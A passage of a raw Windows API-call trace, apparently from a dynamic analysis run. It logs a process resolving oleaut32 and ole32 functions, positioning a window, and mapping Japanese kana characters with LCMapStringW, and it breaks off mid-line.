[0016.866] GetProcAddress (hModule=0x76e70000, lpProcName="MonitorFromWindow") returned 0x76e85f08 [0016.866] GetProcAddress (hModule=0x76e70000, lpProcName="MonitorFromRect") returned 0x76e82b00 [0016.867] GetProcAddress (hModule=0x76e70000, lpProcName="MonitorFromPoint") returned 0x76e7ab64 [0016.867] GetProcAddress (hModule=0x76e70000, lpProcName="EnumDisplayMonitors") returned 0x76e85c30 [0016.867] GetProcAddress (hModule=0x76e70000, lpProcName="GetMonitorInfoA") returned 0x76e7a730 [0016.867] GetProcAddress (hModule=0x76e70000, lpProcName="EnumDisplayDevicesA") returned 0x76e7a5b4 [0016.867] MonitorFromWindow (hwnd=0x3011c, dwFlags=0x2) returned 0x10001 [0016.867] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2877d0 | out: lpmi=0x2877d0) returned 1 [0016.867] SetWindowPos (hWnd=0x3011c, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0016.868] GetWindowThreadProcessId (in: hWnd=0x3011c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x958 [0016.868] GetVersion () returned 0x1db10106 [0016.868] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x7feff1c0000 [0016.868] GetProcAddress (hModule=0x7feff1c0000, lpProcName="DispCallFunc") returned 0x7feff1c2270 [0016.868] GetProcAddress (hModule=0x7feff1c0000, lpProcName="LoadTypeLibEx") returned 0x7feff1ca550 [0016.869] GetProcAddress (hModule=0x7feff1c0000, lpProcName="UnRegisterTypeLib") returned 0x7feff2520d0 [0016.869] GetProcAddress (hModule=0x7feff1c0000, lpProcName="CreateTypeLib2") returned 0x7feff24dbd0 [0016.869] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDateFromUdate") returned 0x7feff1c5c90 [0016.870] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarUdateFromDate") returned 0x7feff1c6330 [0016.870] GetProcAddress (hModule=0x7feff1c0000, lpProcName="GetAltMonthNames") returned 0x7feff1e66c0 [0016.870] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarNumFromParseNum") returned 0x7feff1c4710 [0016.870] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarParseNumFromStr") returned 0x7feff1c48f0 [0016.871] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecFromR4") returned 0x7feff1fb640 [0016.871] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecFromR8") returned 0x7feff1fb360 [0016.871] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecFromDate") returned 0x7feff202640 [0016.871] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecFromI4") returned 0x7feff1e58a0 [0016.872] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecFromCy") returned 0x7feff1e5820 [0016.872] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarR4FromDec") returned 0x7feff1faf20 [0016.872] GetProcAddress (hModule=0x7feff1c0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7feff21a0c0 [0016.872] GetProcAddress (hModule=0x7feff1c0000, lpProcName="GetRecordInfoFromGuids") returned 0x7feff252160 [0016.873] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7feff1e5af0 [0016.873] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArraySetRecordInfo") returned 0x7feff1e5a90 [0016.873] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArrayGetIID") returned 0x7feff1e5a60 [0016.873] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArraySetIID") returned 0x7feff1e5a30 [0016.874] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArrayCopyData") returned 0x7feff1c60b0 [0016.874] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x7feff1c3e90 [0016.874] GetProcAddress (hModule=0x7feff1c0000, lpProcName="SafeArrayCreateEx") returned 0x7feff219f80 [0016.874] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFormat") returned 0x7feff249b20 [0016.875] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFormatDateTime") returned 0x7feff249aa0 [0016.875] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFormatNumber") returned 0x7feff249990 [0016.875] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFormatPercent") returned 0x7feff249890 [0016.875] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFormatCurrency") returned 0x7feff249770 [0016.876] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarWeekdayName") returned 0x7feff22b8d0 [0016.876] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarMonthName") returned 0x7feff22b800 [0016.876] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarAdd") returned 0x7feff2448e0 [0016.876] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarAnd") returned 0x7feff249470 [0016.877] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarCat") returned 0x7feff2496a0 [0016.877] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDiv") returned 0x7feff242fe0 [0016.877] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarEqv") returned 0x7feff249cf0 [0016.877] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarIdiv") returned 0x7feff248ff0 [0016.878] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarImp") returned 0x7feff249c00 [0016.878] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarMod") returned 0x7feff248e60 [0016.878] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarMul") returned 0x7feff243690 [0016.878] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarOr") returned 0x7feff2492d0 [0016.879] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarPow") returned 0x7feff242e80 [0016.879] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarSub") returned 0x7feff243f90 [0016.879] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarXor") returned 0x7feff2491a0 [0016.879] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarAbs") returned 0x7feff227c30 [0016.880] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarFix") returned 0x7feff227a60 [0016.880] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarInt") returned 0x7feff227890 [0016.880] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarNeg") returned 0x7feff227ea0 [0016.880] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarNot") returned 0x7feff249600 [0016.881] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarRound") returned 0x7feff2276a0 [0016.881] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarCmp") returned 0x7feff2483f0 [0016.881] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecAdd") returned 0x7feff1f3070 [0016.881] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarDecCmp") returned 0x7feff1fd700 [0016.882] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarBstrCat") returned 0x7feff1fd890 [0016.882] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarCyMulI4") returned 0x7feff1dcaf0 [0016.882] GetProcAddress (hModule=0x7feff1c0000, lpProcName="VarBstrCmp") returned 0x7feff1e8a00 [0016.882] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefe810000 [0016.883] GetProcAddress (hModule=0x7fefe810000, lpProcName="CoCreateInstanceEx") returned 0x7fefe81de90 [0016.883] GetProcAddress (hModule=0x7fefe810000, lpProcName="CLSIDFromProgIDEx") returned 0x7fefe82a4c4 [0016.883] GetSystemMetrics (nIndex=42) returned 0 [0016.883] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x7fef10655d0 | out: ppMalloc=0x7fef10655d0*=0x7fefe9e5380) returned 0x0 [0016.883] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x7834920 [0016.883] GetUserDefaultLCID () returned 0x409 [0016.883] GetUserDefaultLCID () returned 0x409 [0016.883] IsValidCodePage (CodePage=0x3a4) returned 1 [0016.884] IsValidCodePage (CodePage=0x3b5) returned 1 [0016.885] IsValidCodePage (CodePage=0x3b6) returned 1 [0016.885] IsValidCodePage (CodePage=0x3a8) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="぀", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぁ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="あ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="い", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.886] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="う", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぇ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="え", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぉ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="お", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="か", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.887] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="が", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="き", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="く", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="け", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="げ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="こ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ご", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="さ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ざ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="し", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="じ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="す", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.888] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ず", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="せ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぜ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="そ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="た", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="だ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ち", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぢ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="っ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="つ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="づ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="て", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="で", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="と", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ど", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="な", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="に", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぬ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ね", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="の", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="は", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ば", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぱ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ひ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="び", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぴ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ふ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぶ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぷ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="へ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="べ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぺ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ほ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぼ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ぽ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ま", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="み", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="む", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="め", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="も", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゃ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="や", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゅ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゆ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ょ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="よ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ら", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="り", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="る", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="れ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ろ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゎ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="わ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゐ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゑ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.889] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="を", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ん", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゔ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゕ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゖ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゗", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゘", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゙", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゚", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゛", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゜", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゝ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゞ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゟ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="゠", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ァ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ア", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ィ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="イ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゥ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ウ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ェ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="エ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ォ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="オ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="カ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ガ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="キ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ギ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ク", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="グ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ケ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0016.890] LCMapStringW (in: Locale=0x411, dwMapFlags=0x600000, lpSrcStr="ゲ", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 2 [0016.890] LCMapStringW (in: Locale=0x411, 